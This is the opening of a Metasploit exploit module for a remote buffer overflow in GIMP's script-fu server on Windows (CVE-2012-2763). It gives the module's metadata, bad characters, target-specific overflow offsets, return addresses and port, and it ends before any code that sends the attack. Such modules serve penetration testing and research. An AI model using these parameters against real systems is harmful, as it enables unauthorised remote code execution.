##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
'Name' => 'GIMP script-fu Server Buffer Overflow',
'Description' => %q{
This module exploits a buffer overflow in the script-fu server
component on GIMP <= 2.6.12. By sending a specially crafted packet, an
attacker may be able to achieve remote code execution under the context
of the user.
This module has been tested on GIMP for Windows from installers
provided by Jernej Simoncic.
},
'Author' =>
[
'Joseph Sheridan', # Vulnerability Discovery and PoC
'juan vazquez' # Metasploit module
],
'Version' => '$Revision: $',
'References' =>
[
[ 'CVE', '2012-2763' ],
[ 'OSVDB', '82429' ],
[ 'BID', '53741' ],
[ 'EDB', '18956' ],
[ 'URL', 'http://www.reactionpenetrationtesting.co.uk/advisories/scriptfu-buffer-overflow-GIMP-2.6.html' ]
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
},
'Payload' =>
{
'Space' => 1024,
'BadChars' => "\x00\x09\x0a\x0d\x20\x28\x29\x3b" + (0x80..0xff).to_a.pack("C*"),
'DisableNops' => true,
},
'Platform' => 'win',
'Targets' =>
[
[ 'GIMP 2.6.10 (no DEP) / Windows XP SP3 / Windows 7 SP1',
{
'Offset' => 1102,
'Ret' => 0x00425a52,
'BufferRegister' => 'EDX'
}
],
[ 'GIMP 2.6.1 (no DEP) / Windows XP SP3 / Windows 7 SP1',
{
'Offset' => 1086,
'Ret' => 0x00425a22,
'BufferRegister' => 'EAX'
}
]
],
'Privileged' => true,
'DefaultTarget' => 0,
'DisclosureDate' => 'May 18 2012'))
register_options([Opt::RPORT(10008)], self.class)
end